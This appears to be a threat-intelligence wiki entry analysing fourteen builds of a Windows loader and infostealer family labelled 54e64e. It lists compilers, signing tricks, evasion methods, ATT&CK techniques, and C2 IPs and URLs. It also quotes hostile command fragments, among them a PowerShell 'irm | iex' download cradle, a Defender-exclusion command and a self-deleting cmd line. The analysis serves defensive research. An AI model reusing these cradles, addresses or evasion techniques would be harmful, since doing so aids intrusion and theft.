typeentityconfidencemediumcreated2026-06-01updated2026-09-07malware-familyloaderdefense-evasionc2evasion

54e64e

OpenCTI opaque family label. Currently a single-sample family: a MSVC C++ x64 dropper masquerading as a system-analyzer tool.

Overview

The 54e64e label is assigned by OpenCTI/MalwareBazaar as a family identifier for a Windows loader/dropper cluster. As of 2026-09-07, fourteen distinct build morphs have been confirmed under this umbrella label, spanning MSVC C++, Go, .NET, VB6, IExpress/AutoIt3, Go infostealer, additional MSVC reflective-loader toolchains, a Go reflective PE loader, and a new MSVC 2019/2022 HTTP loader with XOR-0x43 string encryption. The common thread is delivery-chain behaviour (payload download, staging, execution) and the dropped-by-amadey co-label, though independent Amadey confirmation is lacking. OpenCTI also co-labels this sample dropped-by-amadey, suggesting it is part of the Amadey downloader delivery chain, though this relationship is not independently confirmed.

Build Stack

Fourteen distinct build morphs observed within the same OpenCTI umbrella label:

Morph 14 — Go 1.25.9 reflective PE loader with PRNG payload decoding (d8a6366c)

  • Compiler: Go 1.25.9, CGO_ENABLED=0, trimpath=true, GOOS=windows, GOARCH=amd64, GOAMD64=v1 ^[/intel/analyses/d8a6366c9fbf5a41c82774f1e499aebe1a9bf9b078331f5a2c174ca0785c3b92.html]
  • Architecture: AMD64, GUI subsystem
  • Signing: Self-signed Authenticode, 4096-bit RSA. Subject CN=unscramblex.com, issuer CN=E7, validity 2026-04-06 to 2026-07-05.
  • Obfuscation: 13 randomized main.* function names (smallest Go loader namespace in cluster). .symtab preserved (95 KB, 2,219 symbols) — unusual for Go malware, suggests builder does not strip.
  • Resources: No .rsrc section, no version info, no icon, no masquerade. Zero timestamp.
  • C2: No hardcoded strings; payload is decrypted at runtime. Runtime syscall.Syscall surface can resolve any API dynamically.
  • Notable: Newer Go toolchain than Morph 12 (1.25.9 vs 1.25.4). Reduced function count (13 vs 55) suggests compiler inlining or stripped-down builder template. Pure loader; no infostealer surface. First sibling with unscramblex.com masquerade domain.

Morph 1 — Null-padded MSVC C++ (3b13b28c)

  • Compiler: MSVC 19.43 (Visual Studio 2022 17.3+) ^[/intel/analyses/3b13b28ca3a6d3c82228f5cc6a6e0bef583e9c3b3092da4c20fe72c75f3dd386.html]
  • Language: C++ with full MSVC standard library (STL strings, streams, exception support)
  • Packing/Obfuscation: None. No packer, no strip, no encryption. Binary is padded to ~5 MB with null bytes after a small overlay UAC manifest.
  • Signing: Unsigned
  • C2: URLDownloadToFileW to http://80.253.249.169:5000/upfevb.exe
  • Notable: Defender exclusion via PowerShell Add-MpPreference -ExclusionPath, ShellExecuteA to launch downloaded payload, admin gate via AllocateAndInitializeSid + CheckTokenMembership. Fake diagnostic masquerade "System Analyzer Tool v4.2.1".

Morph 2 — UPX-packed x64 (c8db13c1)

  • Packer: UPX (3 sections: UPX0, UPX1, UPX2) with modified/hacked header that defeats standard UPX decompression. ^[/intel/analyses/c8db13c15ad99cc002dda644384e730497972a9995510918f5fc7e2c071b9a0f.html]
  • Compiler: Unknown — timestamp zeroed by UPX
  • Import table: Stripped to four KERNEL32 functions (LoadLibraryA, GetProcAddress, VirtualProtect, ExitProcess) rebuilt at runtime
  • Signing: Unsigned
  • Payload indicators: AES S-Box tables found inside compressed UPX1 section, suggesting encrypted second-stage content

Morph 3 — Go 1.25.4 signed PE64+ infostealer cluster (cc4aa789, 8017acd5)

  • Compiler: Go 1.25.4, CGO_ENABLED=0, -trimpath=true ^[/intel/analyses/8017acd59116f1a84c43953daa1fc856afb65f34b72f438710fcd6094ac9486b.html]
  • Architecture: AMD64, GUI subsystem
  • Signing: Fabricated Authenticode with subject CN=WE1, issuer CN=godaddy.com (self-signed template, 3-month validity)
  • Obfuscation: ~32 randomized main.* function names (10–20 chars each) to fragment control flow
  • Resources: No .rsrc section, no embedded icons
  • C2: No hardcoded strings; runtime-decoded or DGA resolution inferred from cluster siblings

Morph 4 — MSVC 14.0 XMM-loader with encrypted .data (6e0ef3af)

  • Compiler: MSVC 14.0 (Visual Studio 2015+) ^[/intel/analyses/6e0ef3af90cd3e4a8d48b6e5fee62e5d88f69d007135314f9014e63cfb179e93.html]
  • Architecture: AMD64, GUI subsystem
  • Packing/Obfuscation: None — outer PE is not packed, but the 2.8 MB .data section is encrypted in-place via SSE2 paddw/pand loops.
  • Signing: Unsigned
  • Resources: No .rsrc section, no version info, no icons
  • C2: No hardcoded strings; decrypted payload may contain C2 configuration
  • Notable: Mixed CRT — MSVC PE structure with MinGW-w64 pseudo-relocation handler and error strings. Decryption is gated by boolean flags in .bss.

Morph 5 — Signed MSVC 14.0 XMM-loader with Chrome masquerade (536a323c)

  • Compiler: MSVC 14.0 (Visual Studio 2015+) ^[/intel/analyses/536a323c04e73ef4b9b5e2bb9f0c7ee464f8ec443bf8e85a7ffd06087f2f0119.html]
  • Architecture: AMD64, GUI subsystem
  • Packing/Obfuscation: None — 2.5 MB .data section encrypted in-place via SSE2 paddw/pand loops (same morph as 6e0ef3af).
  • Signing: Valid Microsoft Authenticode — CN=Microsoft Corporation / Microsoft Code Signing PCA 2011 / Microsoft Root Certificate Authority 2011. Chain verified via PKCS#7 signature block.
  • Resources: Single RT_VERSION resource with Google Chrome v70.0.3538.110 masquerade (CompanyName: Google Inc., FileDescription: Google Chrome, FileTitle: chrome.exe).
  • C2: No hardcoded strings; decrypted payload may contain C2 configuration.
  • Notable: Smaller encrypted .data payload than 6e0ef3af (2.43 MB vs 2.73 MB), suggesting builder parameterization. Chrome version string is from October 2018, eight years before PE timestamp. OpenCTI mislabels this sample coinminer; it is not a coinminer.

Morph 6 — Go 1.20.6 signed PE64+ infostealer (2f23087f)

  • Compiler: Go 1.20.6, GOOS=windows, stripped ^[sample 2f23087f/strings.txt:1250]
  • Architecture: AMD64, GUI subsystem
  • Signing: Valid GlobalSign DV TLS certificate — CN=seekingalpha.com, issuer=GlobalSign Atlas R3 DV TLS CA 2025 Q4. TLS certificate (not code-signing) abused for Authenticode; chain verifies against Microsoft Trusted Root. ^[sample 2f23087f/binwalk.txt]
  • Obfuscation: 37 randomized main.* function names (6–17 chars, alphanumeric) ^[sample 2f23087f/strings.txt:4330]
  • Resources: No .rsrc section, no embedded icons, no version info
  • C2: No hardcoded strings; Winsock (ws2_32.dll) surface suggests TCP/UDP C2
  • Notable: .symtab section present (unusual for stripped Go malware); module path BqQoxabRybICTZs (randomized)
  • Build ID: j4TU-TUCinBSRq731KfD/46rs2fE3K03_WH702efI/rExPYpfWfYGdZACfJ5CC/iGgE5wPJV-mL0oAGkjmz

Morph 7 — .NET Framework 4.7.2 ILRepack crypter with JC-1-2 decryptor (e14cb7f3)

  • Compiler: C# compiled to IL, merged with ILRepack (LX_QhSq5nqlwW05f temp prefix) ^[sample e14cb7f3/rabin2-info.txt]
  • Architecture: AMD64, GUI subsystem, .NET Framework 4.7.2
  • Packing/Obfuscation: None on outer PE; inner assemblies (MQCommon.UI.AutoUpdater + JC-1-2 decryption DLL) merged via ILRepack. No ConfuserEx, SmartAssembly, or Xenocode.
  • Signing: Unsigned
  • Resources: PNG icon (48×48), RT_VERSION with all-zero fields, RT_MANIFEST with asInvoker execution level. Embedded XML config at offset 0xBA36.
  • C2: WCF SOAP endpoint http://mes.zy.com/MES.Wcf/MSI/MES/AutoupdateService.xml and internal IP http://<lan>/Mes.WCF/MSI/MES. WorkMode=Client config-driven update loop.
  • Notable: MES (Manufacturing Execution System) WCF masquerade suggesting OT/ICS targeting. Custom AES-Z85-column-permutation cipher in embedded JC-1-2 DLL. WinForms UI scaffolding (progressBar1, timer1, backgroundWorker1). Reflective DLL loading via Assembly.Load(byte[]) equivalent. Ten hardcoded 64-char hex strings likely serve as decryption keys or integrity hashes. Administrator build environment (Terminal Services session temp path Temp\2). Static-only (CAPE skipped).

Morph 8 — VB6-native PowerShell/WMI cradle dropper (4544f0e5)

  • Compiler: Visual Basic 6 (VB6), native x86 via MSVBVM60.DLL runtime. ^[/intel/analyses/4544f0e53697d770eac70abad5790433d5e0b70282758c0b3383bf04a4f7f9ba.html]
  • Architecture: PE32, Intel 80386, GUI subsystem, 3 sections (.text, .data, .rsrc). Linker version 6.0.
  • Packing/Obfuscation: None. Not packed, not stripped. .data section VirtualSize=0xA38 with SizeOfRawData=0x0 — null-padded on-disk image expands to zero-initialized data at runtime.
  • Signing: Unsigned
  • Resources: RT_VERSION with fabricated, LLM-scraped strings: CompanyName: "To give an accurate answer", LegalCopyright: "still popular for GPUs", InternalName: "WMI", OriginalFilename: "WMI.exe", ProductName: "Project1". RT_ICON and RT_GROUP_ICON present.
  • C2: Two embedded PowerShell cradles retrieving from http://91.92.240.125:8888/2j and /w5 via irm | iex. Strings obfuscated with trivial replace('s','') stripping.
  • Execution: VB6 runtime instantiates WMI COM objects (Win32_ProcessStartup, Win32_Process, root\cimv2) to spawn PowerShell in a hidden window (ShowWindow = 0).
  • Notable: Default VB6 IDE project/module/form names (Project1, Module1, MDIForm1) indicate low-effort builder. Absurd version strings are a new builder artefact not seen in prior morphs.

Morph 9 — Go 1.24.0 UPX-packed x86 infostealer (0b6c65cd)

  • Compiler: Go 1.24.0, GOOS=windows, GOARCH=386 (x86). ^[/intel/analyses/0b6c65cde50cae62eb3e15a9857193abd2ed130f8d73de6afc3e58ac2397c49a.html]
  • Architecture: PE32, Intel 80386, GUI subsystem, 6 sections after UPX decompression.
  • Packing/Obfuscation: UPX 3.96 outer compression; standard upx -d decompresses cleanly to 12.5 MB unstripped PE.
  • Signing: Unsigned. No .rsrc, no version info, no icon.
  • Resources: None. GUI subsystem with no visible window code.
  • C2: QUIC/HTTP3 via github.com/quic-go/quic-go (TLS 1.3, X25519+MLKEM768, 0-RTT); DNS-over-HTTPS fallback to Cloudflare/Google/Quad9. No hardcoded C2 domain in strings. Telegram exfil (steal finished!).
  • Notable: Rich dependency graph for a stealer: wazero (Wasm runtime), taskmaster (Task Scheduler persistence), go-sqlite3 (browser DB parsing), tonutils-go (TON blockchain). [AFK] 0.28.1 (x86) version string identifies this as AFK Stealer (AFKSystems), a commodity Go infostealer sold on Russian-speaking forums. Not build-related to prior Go morphs (Morph 3, Morph 6) — different family, different builder, different capabilities. Static-only (CAPE skipped).

Morph 10 — MSVC 14.44 reflective loader with Google Drive staging (de601a8a)

  • Compiler: MSVC 14.44 (Visual Studio 2022 v143), build timestamp 2026-03-31 15:39:36 UTC. ^[sample de601a8a/rabin2-info.txt]
  • Architecture: PE32+ x64, GUI subsystem, 5 sections. No packing, no stripping.
  • Signing: Unsigned. No .rsrc beyond RT_MANIFEST; no VS_VERSIONINFO, no icon, no masquerade.
  • IAT: 6 KERNEL32 imports only (GetModuleHandleW, GetProcAddress, LoadLibraryW, VirtualAlloc, VirtualFree, ExitProcess).
  • API resolution: Runtime LoadLibraryW + GetProcAddress for winhttp.dll, shell32.dll, ole32.dll, resolving ~30 APIs into global .data pointers. Not PEB-walking.
  • C2 / staging: Primary: HTTPS GET to drive.usercontent.google.com/download?id=1YBVIDkZgygNfUU2rbJXXCYdrzay5rMdY&export=download&authuser=0&confirm=t. Fallback: 158.94.209.95/good?s=ztest&substr=one.
  • Payload handling: Downloads printable-ASCII encoded payload (custom Base85-like decoder), decodes into RWX buffer, then copies to larger 0x235000-byte staging region via AVX2-optimized memcpy (vmovdqu/vmovntdq).
  • Process creation surface: Resolved but not statically called: CreateProcessW, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, CreatePipe, PeekNamedPipe, ReadFile, WriteFile. Indicates extended-attribute process creation with IPC pipe redirection.
  • Notable: AVX2 YMM registers in both memset and memcpy with vzeroupper discipline — compiled with /arch:AVX2. IMAGE_DEBUG_TYPE_POGO confirms Profile-Guided Optimization release build. This is the smallest confirmed sibling at 10.5 KB. Static-only (CAPE skipped — no Windows guest).

Morph 11 — MSVC 14.44 reflective loader with 7.3 MB encrypted payload (16520f80)

  • Compiler: MSVC 14.44 (Visual Studio 2022 v143), build timestamp 2026-05-29 03:04:59 UTC. ^[sample 16520f80/rabin2-info.txt]
  • Architecture: PE32+ x64, GUI subsystem, 8 sections. No packing, no stripping.
  • Signing: Unsigned. No .rsrc section at all.
  • IAT: 7 KERNEL32 imports only (GetSystemDirectoryW, HeapAlloc, HeapFree, ExitProcess, LoadLibraryA, GetModuleHandleA, GetProcAddress).
  • API resolution: Same runtime LoadLibraryA + GetProcAddress pattern as Morph 10.
  • Payload: 7.3 MB encrypted payload in section 02 (entropy 7.81, r-x+not_paged). Entry point RVA 0x7D8504 falls inside encrypted section — self-decrypting entry point.
  • Anti-triage: First four sections (.text, .rdata, .data, .pdata) have SizeOfRawData=0 — null-padded on-disk, allocated at runtime.
  • C2 / staging: No hardcoded C2 recovered statically; encrypted payload likely contains staging URLs.
  • Notable: Scaled sibling of Morph 10 — same MSVC 14.44 toolchain, same IMAGE_DEBUG_TYPE_POGO, same null-pad anti-triage, same minimal IAT, but 700× larger payload. Suggests parameterized builder with constant stub and variable payload. Static-only (CAPE skipped — no Windows guest).

Morph 12 — Go 1.25.4 reflective PE loader with PRNG payload decoding (018ef44b)

  • Compiler: Go 1.25.4, CGO_ENABLED=0, trimpath=true, GOOS=windows, GOARCH=amd64. ^[sample 018ef44b/strings.txt:1510]
  • Architecture: PE32+ x64, GUI subsystem, 8 sections. No packing, no stripping.
  • Signing: Self-signed Authenticode, CN=xxx.com, issuer E7, 4096-bit RSA, 3-month validity. Chain fails validation. ^[sample 018ef44b/binwalk.txt]
  • IAT: Only kernel32.dll imported statically. ^[sample 018ef44b/pefile.txt]
  • Obfuscation: 55 randomized main.* function names (10–20 chars). Module path RAwSPJDqREzkxCz (randomized). ^[sample 018ef44b/strings.txt:1512]
  • API resolution: All non-KERNEL32 APIs invoked via Go syscall.SyscallN / syscall.Syscall — no net/http or crypto/tls symbols recovered. ^[sample 018ef44b/rabin2-info.txt]
  • Payload handling: Custom multi-stage decryptor (main.sensmww) using modular arithmetic, XOR, and byte shuffle, driven by math/rand PRNG parameters. Decoded payload parsed by embedded PE header walker (main.chdldv), mapped into RWX memory via VirtualAlloc (main.vwhubhlxgr), then execution transferred (main.bjlkfhfvo). Runtime DLL loader (main.lhtbglfiqdcosne) resolves additional APIs via LoadLibraryW + GetProcAddress. ^[/intel/analyses/018ef44b2d71de8d1bfb768592daa406a91a6187bc87a74dee67cb2a0d344f0a.html] |- Notable: First Go-based loader/injector in the 54e64e cluster — prior Go morphs (3, 6, 9) were infostealers. No credential-harvesting surface, no browser/crypto strings. Reflective PE loader pattern matches MSVC Morphs 10–11 but implemented in Go with syscall-level API resolution. No hardcoded network IOCs. Static-only (CAPE skipped — no Windows guest).

Morph 13 — MSVC 2019/2022 x64 HTTP loader with XOR-0x43 string encryption (37d8875b) |- Compiler: MSVC 2019/2022 — Rich header shows Utc1900_C (×10), Utc1900_CPP, Linker1400. ^[sample 37d8875b/rabin2-info.txt] |- Architecture: PE32+ x64, GUI subsystem, 5 sections. No packing, no stripping. |- Signing: Unsigned. No .rsrc section, no version info, no icon. |- Obfuscation: Single-byte XOR 0x43 string encryption across all embedded API names, C2 IPs, registry paths, and error messages. Decrypted at runtime via fcn.14000557c. |- IAT: Standard static imports (KERNEL32.dll, ADVAPI32.dll, ole32.dll, OLEAUT32.dll, USER32.dll, ws2_32.dll absent but winhttp.dll/wininet.dll runtime-resolved). |- API resolution: HTTP APIs (WinHttpOpen, InternetOpenW, etc.) resolved at runtime via indirect calls through a global function-pointer table (0x140009f20–0x140009f58), not via static IAT. |- C2 / staging: Hardcoded IPs 62.60.226.159, 196.251.107.130, 196.251.107.104; endpoint /api.php; beacon parameters include uid, user, pc, os, ver, ram, adm. |- Process creation: Imports CreateProcessW, WriteProcessMemory, SetThreadContext, ResumeThread, NtCreateSection, NtMapViewOfSection, NtUnmapViewOfSection, VirtualProtect — hollowing or section-mapping injection inferred. |- COM automation: CoInitializeEx → VariantClear → vtable dispatch at offsets 0x38, 0x50, 0x78, 0x48, 0x88, 0xB0, 0x90, 0x80, 0xE0, 0x110, 0x10 — WMI or Task Scheduler COM surface. |- Persistence: Software\Microsoft\Windows\CurrentVersion\Run referenced in decrypted strings. |- Anti-triage: CreateMutexW singleton gate; process exits immediately if mutex already exists. |- Notable: Dual-thread architecture (identity thread + HTTP thread); structured error strings (Err_Download_Failed, Err_Invalid_PE_Header_Not_MZ, etc.) suggest framework-level C2 error reporting; cmd.exe /C timeout /T 3 & del "%s" & start "" "%s" self-erasure pattern. Static-only (CAPE skipped — no Windows guest). ^[/intel/analyses/37d8875b983771758b7ad2abcd68672315558811a2c52aee59d3ac4cd3cb79f7.html]

Deploy / TTPs

Technique ATT&CK ID Evidence
Ingress Tool Transfer T1105 URLDownloadToFileW to fetch http://80.253.249.169:5000/upfevb.exe (Morph 1 only)
Impair Defenses T1562.001 Spawns hidden powershell Add-MpPreference -ExclusionPath (Morph 1 only)
Virtualization/Sandbox Evasion T1497.001 PRNG-based delay loop and verbose fake diagnostic output (Morph 1)
Signed Binary Proxy Execution T1218.011 ShellExecuteA to launch downloaded payload (Morph 1)
User Execution T1204.002 PE GUI executable, user-launched
Bypass UAC T1548.002 Admin gate via AllocateAndInitializeSid + CheckTokenMembership (Morph 1)
Match Legitimate Name or Location T1036.005 Masquerades as "System Analyzer Tool v4.2.1" (Morph 1)
Masquerading T1036 Go morph presents fabricated godaddy.com code-signing cert ^[/intel/analyses/8017acd59116f1a84c43953daa1fc856afb65f34b72f438710fcd6094ac9486b.html]
Ingress Tool Transfer T1105 WebClient.DownloadFileAsync to WCF SOAP endpoint mes.zy.com (Morph 7)
Reflective Code Loading T1620 Assembly.Load of embedded JC-1-2 DLL via ExtractEmbeddedJcDecryptorDll (Morph 7)
Match Legitimate Name or Location T1036.005 Masquerades as "MQCommon.UI.AutoUpdater" / MES WCF auto-updater (Morph 7)
Command and Scripting Interpreter T1059.001 PowerShell expression execution (capa hit, Morph 7)
System Information Discovery T1082 GetCurrentPrivilegeLevel, WindowsPrincipal, hostname enumeration (Morph 7)
Application Window Discovery T1010 FindWindow, WinForms GUI enumeration (Morph 7)
File and Directory Discovery T1083 CheckUpdateFiles, GetFiles, directory existence checks (Morph 7)
Command and Scripting Interpreter: PowerShell T1059.001 Embedded `powershell iex('irm ...
Ingress Tool Transfer T1105 irm 91.92.240.125:8888/2j and /w5 — HTTP payload retrieval (Morph 8)
Hide Artifacts: Hidden Window T1564.003 WMI Win32_ProcessStartup.ShowWindow = 0 + Win32_Process.Create (Morph 8)
Masquerading: Match Legitimate Name or Location T1036.005 OriginalFilename: WMI.exe, InternalName: WMI (Morph 8)
Credentials from Web Browsers T1555.003 main.getChromeCookies, main.getGeckoCookies, Login Data, logins.json, key4.db (Morph 9)
Screen Capture T1113 PrintScreen, GetClipboardData, CreateCompatibleBitmap (Morph 9)
Clipboard Data T1115 Clipboard:, Clipboard: MachineGuid (Morph 9)
System Information Discovery T1082 HWID:, PC Name:, CPU:, GPU:, GEO:, MachineGuid (Morph 9)
Create or Modify System Process T1543 github.com/capnspacehook/taskmaster, error creating registered task (Morph 9)
Application Layer Protocol T1071 quic-go, http3, quic iv, quic hp, quic key (Morph 9)
Protocol Tunneling T1572 DoH endpoints https://1.1.1.1/dns-query, https://dns.google/resolve (Morph 9)
Exfiltration Over Web Service T1567 application/json, POST, steal finished!, Telegram Desktop paths (Morph 9)
File and Directory Discovery T1083 Enumerates %LOCALAPPDATA%, %APPDATA%, browser profile paths for 15+ browsers (Morph 9)
Ingress Tool Transfer T1105 WinHttpOpenRequest GET to drive.usercontent.google.com (Morph 10)
Ingress Tool Transfer T1105 HTTP GET to 158.94.209.95/good fallback (Morph 10)
Reflective Code Loading T1620 Custom decoder → RWX VirtualAlloc → AVX2 memcpy staging (Morph 10)
Reflective Code Loading T1620 Self-decrypting entry point inside encrypted r-x section, runtime API resolution (Morph 11)
Obfuscated Files or Information T1027 7.3 MB encrypted payload section with no packer signature (Morph 11)
Masquerading T1036.005 Null-padded on-disk sections hide true structure from file-offset scanners (Morph 11)
Reflective Code Loading T1620 Go main.chdldv parses PE headers; main.vwhubhlxgr allocates RWX memory; execution transferred to decoded payload (Morph 12)
Native API T1106 Go syscall.SyscallN / syscall.Syscall direct Windows API invocation (Morph 12)
Deobfuscate/Decode Files or Information T1027 math/rand-driven custom decryptor (main.sensmww) with modular arithmetic + XOR + byte shuffle (Morph 12)
Process Injection T1055
Virtualization/Sandbox Evasion T1497.001
Ingress Tool Transfer T1105
Obfuscated Files or Information T1027
Create or Modify System Process T1543
Process Injection T1055
Native API T1106
Hide Artifacts T1564.001
System Information Discovery T1082
Command and Scripting Interpreter T1059.003
Application Layer Protocol T1071.001
Masquerading T1036.005
Reflective Code Loading T1620
Native API T1106
Deobfuscate/Decode Files or Information T1027
Process Injection T1055
Virtualization/Sandbox Evasion T1497.001
Masquerading T1036.005

Variants / Aliases

  • Amadey dropper (unconfirmed upstream relationship; OpenCTI co-label: dropped-by-amadey)
  • Build artifact name: certpert (from PDB path, Morph 1)

Notable Analyses

  • raw/analyses/3b13b28ca3a6d3c82228f5cc6a6e0bef583e9c3b3092da4c20fe72c75f3dd386 — Deep static analysis; static-only (CAPE skipped). Null-padded MSVC C++ "certpert" dropper with fake diagnostic masquerade, Defender exclusion via PowerShell, HTTP payload fetch.
  • raw/analyses/c8db13c15ad99cc002dda644384e730497972a9995510918f5fc7e2c071b9a0f — UPX-packed x64 sibling with modified/hacked packer. Three sections, four KERNEL32 imports, compressed payload with AES S-Box indicators. Standard UPX decompression fails. Static-only (CAPE skipped).
  • raw/analyses/cc4aa789cf0c80b32004b90be6be0ad80944ad85730c6095cc3ca29469059503 — Go 1.25.4 PE64 infostealer. Signed DV cert CN=askart.com, 24 randomized main.* functions, GUI subsystem, no .rsrc, no hardcoded C2. Matches golang-stealer-build-pattern cluster; not build-related to prior MSVC siblings. Static-only (CAPE skipped).
  • raw/analyses/8017acd59116f1a84c43953daa1fc856afb65f34b72f438710fcd6094ac9486b — Go 1.25.4 PE64+ infostealer sibling. Fabricated Authenticode CN=WE1 / issuer=godaddy.com, 32 randomized main.* functions, build ID M5d1UAj2sgoz.... Static-only (CAPE skipped).
  • raw/analyses/6e0ef3af90cd3e4a8d48b6e5fee62e5d88f69d007135314f9014e63cfb179e93 — MSVC 14.0 XMM-loader with 2.8 MB encrypted .data. SSE2 paddw/pand in-place decryption, MinGW-w64 pseudo-relocation handler, indirect thunk dispatch. No hardcoded C2. Static-only (CAPE skipped).
  • raw/analyses/536a323c04e73ef4b9b5e2bb9f0c7ee464f8ec443bf8e85a7ffd06087f2f0119 — Signed MSVC 14.0 XMM-loader with Chrome masquerade. Valid Microsoft Authenticode, Google Chrome v70 VS_VERSIONINFO, SSE2 paddw/pand decryption, 2.5 MB encrypted .data. Second confirmed sibling of the XMM-loader morph. Static-only (CAPE skipped).
  • raw/analyses/7aed04abf7cc42695481b89e4db2e8760eb56dd0fafc7da9f13a43c1158efc5e — Signed IExpress SFX with AutoIt3 payload. Valid Sectigo Authenticode on wextract.exe; 22 CAB fragments reassembled by obfuscated batch script into AutoIt3.exe + .a3x script. No C2 strings in outer stages. Static-only (CAPE skipped).
  • raw/analyses/2f23087fd9b9804115c782d2d0f88046d370162b5b982299ae0a518ade9664b5 — Go 1.20.6 signed PE64+ infostealer. Valid GlobalSign DV TLS certificate CN=seekingalpha.com, 37 randomized main.* functions, .symtab present, no .rsrc, Winsock C2 surface. Static-only (CAPE skipped).
  • raw/analyses/e14cb7f34407a042fc6a20aebd73d36b0d7a91a724872988ec08e7e4e39934a6 — .NET Framework 4.7.2 ILRepack crypter with JC-1-2 decryptor. MES WCF C2 (mes.zy.com), custom AES-Z85-column-permutation cipher, embedded decryptor DLL at 0xBCF3, WinForms UI scaffolding, admin TS build environment PDB. Static-only (CAPE skipped).
  • raw/analyses/4544f0e53697d770eac70abad5790433d5e0b70282758c0b3383bf04a4f7f9ba — VB6-native PowerShell/WMI cradle dropper. Minimal MSVBVM60.DLL PE with two replace('s','')-obfuscated irm | iex cradles to 91.92.240.125:8888/2j and /w5. WMI Win32_Process hidden window spawn. Absurd LLM-scraped VS_VERSIONINFO ("To give an accurate answer", "still popular for GPUs"). Static-only (CAPE skipped).
  • raw/analyses/0b6c65cde50cae62eb3e15a9857193abd2ed130f8d73de6afc3e58ac2397c49a — Go 1.24.0 UPX-packed x86 infostealer (AFK Stealer). QUIC/HTTP3 C2, wazero Wasm runtime, taskmaster persistence, go-sqlite3 browser DB parsing, tonutils-go TON blockchain, DoH fallback, Telegram exfil. [AFK] 0.28.1 (x86) version string. Static-only (CAPE skipped).
  • raw/analyses/de601a8a3d45d818f6bd867f5bba33d576bc1d9d983511b66f2b22447dd5d8e4 — MSVC 14.44 reflective loader with Google Drive staging and custom Base85 decoder. 10.5 KB, AVX2-optimized, /arch:AVX2, PGO release build. Runtime LoadLibraryW/GetProcAddress for winhttp.dll/shell32.dll/ole32.dll. HTTPS GET to Google Drive primary, 158.94.209.95 IP fallback. Process-creation surface indicators (InitializeProcThreadAttributeList, CreatePipe, etc.) resolved but not statically called. Smallest confirmed sibling. Static-only (CAPE skipped).
  • raw/analyses/16520f80193c6e45d207ac0ffad8b29446194ad9734d7ee2ea8178f91eacf491 — MSVC 14.44 reflective loader with 7.3 MB encrypted payload (Morph 11). Scaled sibling of de601a8a — same toolchain, same IMAGE_DEBUG_TYPE_POGO, same null-pad anti-triage, same minimal IAT, but 700× larger encrypted payload in section 02. Entry point RVA 0x7D8504 falls inside encrypted region (self-decrypting entry point). No hardcoded C2 recovered statically. Suggests parameterized builder with constant stub and variable payload. Static-only (CAPE skipped — no Windows guest).
  • raw/analyses/018ef44b2d71de8d1bfb768592daa406a91a6187bc87a74dee67cb2a0d344f0a — Go 1.25.4 reflective PE loader with PRNG payload decoding (Morph 12). 55 randomized main.* functions, self-signed CN=xxx.com, minimal IAT (kernel32.dll only), runtime API resolution via syscall.SyscallN, custom decryptor (main.sensmww) with math/rand-driven parameters, PE parser (main.chdldv), RWX VirtualAlloc mapping (main.vwhubhlxgr), and DLL loader (main.lhtbglfiqdcosne). First Go loader/injector in cluster; prior Go morphs were infostealers. No hardcoded network IOCs. Static-only (CAPE skipped — no Windows guest).
  • raw/analyses/37d8875b983771758b7ad2abcd68672315558811a2c52aee59d3ac4cd3cb79f7 — MSVC 2019/2022 x64 HTTP loader with XOR-0x43 string encryption (Morph 13). 40 KB, 5 sections, unsigned. Single-byte XOR 0x43 string obfuscation across all C2/API/registry/error strings. Dual-thread architecture: identity collection + HTTP beaconing. Runtime-resolved WinHttp/WinInet APIs via global function-pointer table. Hardcoded C2 IPs 62.60.226.159, 196.251.107.130, 196.251.107.104; endpoint /api.php. Structured error-reporting strings (Err_Download_Failed, Err_Invalid_PE_Header_Not_MZ, etc.). COM automation via vtable dispatch (WMI/Task Scheduler surface). Process injection imports (CreateProcessW, WriteProcessMemory, SetThreadContext, NtCreateSection, NtMapViewOfSection). Registry Run persistence + cmd.exe self-erasure. Static-only (CAPE skipped — no Windows guest).
  • raw/analyses/d8a6366c9fbf5a41c82774f1e499aebe1a9bf9b078331f5a2c174ca0785c3b92 — Go 1.25.9 reflective PE loader with PRNG payload decoding (Morph 14). 13 randomized main.* functions (smallest Go loader namespace in cluster), self-signed CN=unscramblex.com / issuer=E7, .symtab preserved (95 KB, 2,219 symbols), zero timestamp, no .rsrc. PRNG seeded with time.Now().UnixNano() + constant 0xdd7b17f80, floating-point delay gates, 0xe200 quadword payload copy from .rdata, word-wise XOR/ADD transforms (main.wmisltgay), RWX VirtualAlloc wrapper (main.gibxwporkamofsc with args 0x40/0x3000), execution transfer via syscall.Syscall. No hardcoded C2. Pure loader; no infostealer surface. Static-only (CAPE skipped — no Windows guest). |

Capabilities

  • admin-rights-gate-sid-check
  • prng-delay-loop-evasion
  • fake-diagnostic-output-masquerade
  • http-payload-download
  • defender-exclusion-powershell
  • shell-execute-dropped-payload
  • upx-compression-with-modified-header
  • runtime-import-table-rebuild
  • go-infostealer-randomized-function-names
  • authenticode-signing-throwaway-dv-cert
  • gui-subsystem-no-window-code
  • runtime-c2-resolution-no-hardcoded-ioc
  • xmm-sse2-wordwise-payload-decryption
  • mingw-pseudo-relocation-handler
  • indirect-thunk-api-resolution
  • large-encrypted-data-section
  • valid-microsoft-authenticode-signing
  • chrome-version-info-masquerade
  • tls-cert-authenticode-abuse-seekingalpha
  • symtab-present-stripped-go-binary
  • self-decrypting-entry-point-in-encrypted-section
  • pgo-release-build-profile-guided-optimization
  • runtime-api-resolution-loadlibrarya-getprocaddress
  • large-null-padded-section-anti-triage
  • go-version-1.20.6-build
  • dotnet-ilrepack-merged-crypter
  • aes-z85-column-permutation-decryption
  • embedded-pe-dll-reflective-load
  • wcf-soap-c2-config-driven
  • mes-ot-masquerade-update-framework
  • hardcoded-64char-hex-key-material
  • admin-ts-build-environment-pdb-artifact
  • empty-vs-versioninfo-masquerade
  • vb6-native-compiled-dropper
  • powershell-cradle-embedded-strings
  • trivial-character-stripping-obfuscation
  • wmi-hidden-process-powershell-spawn
  • http-irm-iex-payload-retrieval
  • llm-scraped-version-info-masquerade
  • credential-harvesting-chrome-dpapi
  • credential-harvesting-firefox-nss
  • credential-harvesting-brave-ielevator
  • crypto-wallet-seed-extraction
  • crypto-wallet-file-extraction
  • telegram-desktop-data-theft
  • steam-credential-theft
  • clipboard-hijack-cryptocurrency
  • system-information-enumeration
  • screen-capture-bitmap
  • quic-http3-c2-transport
  • dns-over-https-fallback
  • wasm-in-process-module-loader
  • windows-task-scheduler-persistence
  • ton-blockchain-address-generation
  • sqlite3-browser-database-parsing
  • browser-cookie-sqlite-extraction
  • gecko-cookie-json-extraction
  • json-exfiltration-post
  • telegram-bot-exfiltration
  • machineguid-fingerprinting
  • google-drive-payload-staging
